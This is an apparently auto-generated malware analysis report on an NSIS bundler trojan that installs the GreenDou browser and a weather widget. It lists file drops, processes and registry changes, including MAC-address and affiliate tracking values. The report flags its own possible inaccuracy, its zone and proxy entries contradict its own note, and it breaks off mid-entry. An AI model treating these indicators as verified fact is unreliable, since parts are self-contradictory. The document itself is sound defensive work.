Trojan.Downloader.Hicrazyk.A_9b1f598aec

by malwarelabrobot on May 22nd, 2014 in Malware Descriptions.

Trojan.NSIS.StartPage.eg (Kaspersky), Trojan.Downloader.Hicrazyk.A (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 9b1f598aec7a30c57e3b470e6aaf77cb
SHA1: 5a4b41f40e56d79071961d7e5b32993c61b1e820
SHA256: 3ef1fd2ccd2c8cfaf0751e6fda774a745ebe40dbe23e5c981623e0723f125359
SSDeep: 24576:kwSn/ryOTUU6b34jcK3yXahZe txE6ZrCcQFLPlVBzXh9Br/A:pS/f6Uj2a3HEOOcQFLBbzdI
Size: 1355038 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AllaboutApp
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

What the activity below shows: the sample behaves as an NSIS installer (it unpacks plugin DLLs such as NSISdl.dll, System.dll, nsDialogs.dll and Inetc.dll to %Temp%\nsp2.tmp, and Kaspersky's name, Trojan.NSIS.StartPage.eg, points the same way). It installs the "GreenDou" browser (绿豆浏览器) under %Program Files%\greeou with Desktop and Start Menu shortcuts, drops and runs the weather-widget installer 365weatherIns_61.exe, which installs "worldweather" 5.0.0.5002 with an HKCU Run autostart and records the machine's MAC address under an App Paths key, and writes two further installers, setup_3128.exe and setup_a7158.exe, to %Temp%. A Sogou quick-launch shortcut (搜狗高速上网.lnk) is also created, and greendou.exe fetches 123.sogou.com.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

worldweather.exe:2288
worldWeatherUpdate.5002.exe:3076
365weatherIns_61.exe:456
greendou.exe:2332
PM10.5002.exe:2384
worldWeatherRealTime5002.exe:1344
mscorsvw.exe:424

The Trojan injects its code into the following process(es):

%original file name%.exe:1956 (the sample's own process; the plugin DLLs it unpacks to %Temp%\nsp2.tmp, such as NSISdl.dll, System.dll and nsDialogs.dll, together with the Kaspersky name Trojan.NSIS.StartPage.eg, identify it as an NSIS installer)

File activity

The process worldweather.exe:2288 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (288 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Program Files%\worldweather\5.0.0.5002\weatherData.tmp (354 bytes)
%Documents and Settings%\%current user%\Cookies\WXPOEL80.txt (73 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\go[1].htm (0 bytes)

The process worldWeatherUpdate.5002.exe:3076 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\PM10Context[1].xml (835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\AQIContext[1].xml (365 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\AQIContext\AQIContext.db.!mv (365 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\PM25Context[1].xml (624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\WeatherContext[1].xml (509 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (1196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\366[1].ico (16369 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\367.ico.!mv (1177 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\PM25Context\PM25Context.db.!mv (624 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\366.ico.!mv (16369 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\PM10Context\PM10Context.db.!mv (835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\369[1].ico (16369 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db.!mv (509 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\369.ico.!mv (16369 bytes)
%Documents and Settings%\%current user%\Cookies\JB38A659.txt (102 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\367[1].ico (1177 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db (0 bytes)

The process 365weatherIns_61.exe:456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\worldweather\5.0.0.5002\skins\default\btn_min.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\1.jpg (1552 bytes)
%Program Files%\worldweather\5.0.0.5002\PM10.5002.exe (7192 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\loading.gif (8 bytes)
%Program Files%\worldweather\5.0.0.5002\weather.db (6584 bytes)
%Program Files%\worldweather\5.0.0.5002\uninst.exe (2251 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\un_update.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\btn_next.bmp (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\bg.bmp (18424 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_move.jpg (1 bytes)
%Program Files%\worldweather\5.0.0.5002\areacode.db (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\2.jpg (1552 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\update.html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\checkbox2.bmp (2 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\future\n99.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\checkbox1.bmp (2 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\future\tips.ico (1856 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_setting.jpg (3 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db (352 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\i.gif (170 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\err.png (784 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\updateRecord.db (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\loading1.bmp (696 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\min.png (440 bytes)
%Program Files%\worldweather\5.0.0.5002\sqliteApi.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu4.tmp (80589 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\inetc.dll (784 bytes)
%Program Files%\worldweather\5.0.0.5002\sqlite3.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (325 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\btn_complete.bmp (2392 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_max.jpg (3 bytes)
%Program Files%\worldweather\5.0.0.5002\worldWeatherRealTime5002.exe (4992 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\bg_small.png (4 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (325 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\tongji.html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\nsWindows.dll (10 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\worldweather\大众天气预报卸载.lnk (911 bytes) [GBK name: "Uninstall Dazhong Weather Forecast"]
%Program Files%\worldweather\5.0.0.5002\worldweather.exe (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\loading.png (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\worldweather\大众天气预报.lnk (943 bytes) [GBK name: "Dazhong Weather Forecast"]
%Program Files%\worldweather\5.0.0.5002\skins\common\large\n99.png (784 bytes)
%Program Files%\worldweather\5.0.0.5002\AQI.5002.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\btn_close.bmp (1 bytes)
%Program Files%\worldweather\5.0.0.5002\WeatherContext\WeatherContext.db (352 bytes)
%Program Files%\worldweather\5.0.0.5002\worldWeatherUpdate.5002.exe (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\tongji_61[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\ToggleImages.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\System.dll (11 bytes)
%Program Files%\worldweather\5.0.0.5002\PM25.5002.exe (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\3.jpg (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\md5dll.dll (8 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\bg_large.png (9 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\kz.png (3 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\close.png (873 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\skin.xml (6 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_close.jpg (3 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\topbar.png (3 bytes)
%Program Files%\worldweather\5.0.0.5002\mfc5002.dll (5520 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\updateContext\updateRecord.db (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\loading2.bmp (696 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\worldweather\updateContext\VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp (0 bytes)

The process greendou.exe:2332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\123_sogou_com[1] (10094 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\123_sogou_com[1].txt (14600 bytes)
%Program Files%\greeou\profile\Defaults\config.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Program Files%\greeou\profile\Defaults\last.ini (1134 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\123_sogou_com[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041520130416\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013040820130415\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013040820130415 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041520130416 (0 bytes)

The process PM10.5002.exe:2384 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (24 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\搜狗高速上网.lnk (1 bytes) [GBK name: "Sogou high-speed internet access"]
%Documents and Settings%\All Users\Application Data\367.ico (9 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (24 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DFFF22.tmp (0 bytes)

The process mscorsvw.exe:424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (848 bytes)

The process %original file name%.exe:1956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\greeou\skin\Default\control\tab_hover.png (346 bytes)
%Program Files%\greeou\skin\Default\control\tab_bg.png (314 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new3.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\open.ini (3 bytes)
%Program Files%\greeou\skin\Default\misc\16_ad_hunter.png (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\365weatherIns_61.exe (114375 bytes)
%Program Files%\greeou\profile\Template\start\style.css (3 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back3.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\NSISdl.dll (14 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_favorites2.png (696 bytes)
%Program Files%\greeou\skin\Default\control\MenuItem_Hover.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\greeou\skin\Default\misc\24_go.png (650 bytes)
%Program Files%\greeou\skin\Default\shared\16_new.png (650 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_favorites.png (700 bytes)
%Program Files%\greeou\profile\Defaults\CommandBars.ini (1 bytes)
%Program Files%\greeou\skin\Default\mskin.ini (10 bytes)
%Program Files%\greeou\GreenDou.exe (25123 bytes)
%Program Files%\greeou\skin\Default\control\status_bar_bg.png (445 bytes)
%Program Files%\greeou\skin\Default\control\combo_dropdown_hover.png (774 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward.png (947 bytes)
%Program Files%\greeou\skin\Default\control\win_minimize.png (202 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_refresh.png (1 bytes)
%Program Files%\greeou\skin\Default\control\combo_dropdown.png (794 bytes)
%Program Files%\greeou\profile\Template\start\images\logo.gif (3 bytes)
%Program Files%\greeou\skin\Default\control\Button_Pressed.png (1 bytes)
%Program Files%\greeou\profile\Template\start\index.html (832 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_home.png (1 bytes)
%Program Files%\greeou\skin\Default\misc\16_website_info.png (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new.png (879 bytes)
%Program Files%\greeou\skin\Default\control\title_bg.png (655 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_home2.png (1 bytes)
%Program Files%\greeou\profile\Template\start\images\header_logo.gif (2 bytes)
%Program Files%\greeou\skin\Default\shared\16_edit.png (646 bytes)
%Program Files%\greeou\skin\Default\control\tab_sidebar.png (321 bytes)
%Program Files%\greeou\profile\SearchEngine\config.ini (226 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_new2.png (801 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_page_zoom2.png (724 bytes)
%Program Files%\greeou\profile\Template\start\images\dian.gif (376 bytes)
%Program Files%\greeou\skin\Default\control\win_close.png (362 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_refresh2.png (1 bytes)
%Program Files%\greeou\profile\Template\start\images\header_bg.gif (83 bytes)
%Program Files%\greeou\skin\Default\control\tab_active.png (1 bytes)
%Program Files%\greeou\skin\Default\control\mainframe.png (288 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back2.png (1 bytes)
%Program Files%\greeou\skin\Default\control\tab_inactive.png (281 bytes)
%Program Files%\greeou\skin\Default\control\sidebar_tab_inactive.png (259 bytes)
%Program Files%\greeou\skin\Default\misc\16_folder_open.png (614 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_search.png (871 bytes)
%Program Files%\greeou\skin\Default\control\combosearch_dropdown.png (794 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_stop2.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setup_a7158.exe (3004 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\xID.dll (3 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_search2.png (969 bytes)
%Program Files%\greeou\skin\Default\control\win_maximum.png (275 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_new.png (637 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_page_zoom.png (733 bytes)
%Program Files%\greeou\skin\Default\control\tab_sidebar_hover.png (322 bytes)
%Program Files%\greeou\skin\Default\control\Button_Hover.png (1 bytes)
%Program Files%\greeou\skin\Default\control\progress.png (708 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back.png (953 bytes)
%Program Files%\greeou\skin\Default\control\combo.png (260 bytes)
%Program Files%\greeou\profile\SearchEngine\google.ico (1 bytes)
%Program Files%\greeou\skin\Default\control\tab_new.png (350 bytes)
%Program Files%\greeou\skin\Default\control\combosearch_dropdown_hover.png (774 bytes)
%Program Files%\greeou\profile\Template\start\left.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setup_3128.exe (125242 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\nsRandom.dll (935 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward2.png (1 bytes)
%Program Files%\greeou\profile\Defaults\config.ini (902 bytes)
%Program Files%\greeou\skin\Default\control\skin_selector.png (283 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\Md5dll.dll (8 bytes)
%Program Files%\greeou\skin\Default\control\win_restore.png (302 bytes)
%Program Files%\greeou\skin\Default\control\Button_Checked.png (976 bytes)
%Program Files%\greeou\skin\Default\misc\16_page.png (519 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\processwork.dll (6140 bytes)
%Program Files%\greeou\skin\Default\control\tab_close.png (259 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_history2.png (994 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_undo2.png (840 bytes)
%Program Files%\greeou\skin\Default\control\tab_new_hover.png (346 bytes)
%Program Files%\greeou\profile\SearchEngine\taobao.ico (1 bytes)
%Program Files%\greeou\skin\Default\control\sidebar_tab_active.png (957 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new2.png (1 bytes)
%Program Files%\greeou\skin\Default\misc\16_folder_closed.png (587 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\System.dll (11 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_stop.png (1 bytes)
%Program Files%\greeou\skin\Default\misc\16_open_in_bg.png (507 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\绿豆浏览器\绿豆浏览器.lnk (678 bytes) [GBK name: "GreenDou (Green Bean) Browser"]
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\Inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Desktop\绿豆浏览器.lnk (666 bytes) [GBK name: "GreenDou (Green Bean) Browser"]
%Program Files%\greeou\skin\Default\toolbar\16_history.png (847 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_undo.png (748 bytes)
%Program Files%\greeou\profile\SearchEngine\baidu.ico (2 bytes)
%Program Files%\greeou\skin\Default\misc\24_go2.png (648 bytes)
%Program Files%\greeou\profile\Defaults\last.ini (348 bytes)
%Program Files%\greeou\skin\Default\control\combo_hover.png (261 bytes)
%Program Files%\greeou\skin\Default\control\tab_close_hover.png (2 bytes)
%Program Files%\greeou\profile\Defaults\searchkeys.ini (14 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward3.png (1 bytes)
%Program Files%\greeou\ico\taobao.ico (2104 bytes)
%Program Files%\greeou\skin\Default\misc\16_open_in_new.png (548 bytes)
%Program Files%\greeou\profile\Template\start\images\logo2.gif (596 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\setup_a7158.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\open.ini (0 bytes)

Registry activity

The process worldweather.exe:2288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 3E 7C 02 F5 A0 AB 08 14 76 BD 80 D7 AA F8 7E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\worldweather\5.0.0.5002]
"worldWeatherUpdate.5002.exe" = "天气预报升级核心" ("weather forecast update core")

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 45 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

The Trojan sets the IE security-zone value that maps all hosts which bypass the proxy to the Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan sets the value that maps all network (UNC) paths to the Intranet zone:

"UNCAsIntranet" = "1"

The Trojan sets the value that maps all local intranet site names not listed in another zone to the Intranet zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Note that AutoDetect, ProxyBypass, UNCAsIntranet and IntranetName set to 1 are Internet Explorer's default Local intranet settings, and ProxyEnable = 0 with the proxy values absent is simply the state of a machine with no proxy configured. urlmon and WinINet write these values as a side effect of a process using them (the updated SavedLegacySettings blob above is part of the same connection-settings save), which is why they recur under every process in this report. On their own they are not evidence that the sample tampers with zone or proxy settings; the Run key, the Uninstall and App Paths entries, and the files dropped under %Program Files% are the indicators worth acting on.

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process worldWeatherUpdate.5002.exe:3076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 12 58 84 14 40 69 99 83 76 A6 88 17 F9 C2 8F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\worldweather\5.0.0.5002]
"PM10.5002.exe" = "PM10.5002"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 47 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan sets the IE security-zone value that maps all hosts which bypass the proxy to the Intranet zone (an IE default value):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan sets the value that maps all network (UNC) paths to the Intranet zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan sets the value that maps all local intranet site names not listed in another zone to the Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 365weatherIns_61.exe:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"UninstallString" = "%Program Files%\worldweather\5.0.0.5002\uninst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"index" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\365weatherIns_61.exe"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"jieguo" = "mac=00-0C-29-3B-DF-2F&soft_id=33&tuiguang_id=C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\365weatherIns_61.exe&yanzheng=f72e066ddb1d94ae63e1d32390e05757"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"DisplayIcon" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
